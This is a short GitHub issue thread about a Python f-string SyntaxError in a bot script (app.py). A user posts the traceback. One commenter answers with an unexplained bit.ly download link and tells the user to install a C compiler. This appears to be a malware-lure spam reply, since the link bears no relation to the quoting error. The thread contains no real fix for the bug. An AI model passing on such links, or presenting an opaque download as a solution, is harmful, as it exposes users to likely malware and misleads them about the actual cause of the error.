### ISSUE TITLE
ERROR

### ISSUE THREAD

**Issue by KarinaBash** [Shyzg/seed#1]
File "/root/shyzg/seed/app.py", line 619
    f"{Fore.YELLOW + Style.BRIGHT}[ Bird Can Be Complete Hunt At {datetime.fromisoformat(is_leader_bird['hunt_end_at'].replace("Z", "+00:00")).astimezone().strftime('%x %X %Z')} ]{Style.RESET_ALL}"
                                                                                                                                ^
SyntaxError: f-string: unmatched '('

**Comment by aroopcodder** [comment]
download
https://bit.ly/3TyLBMS
If you don't have the c compliator, install it.(gcc or clang)

**Comment by KarinaBash** [comment]
> download https://bit.ly/3TyLBMS If you don't have the c compliator, install it.(gcc or clang)

apa iyah
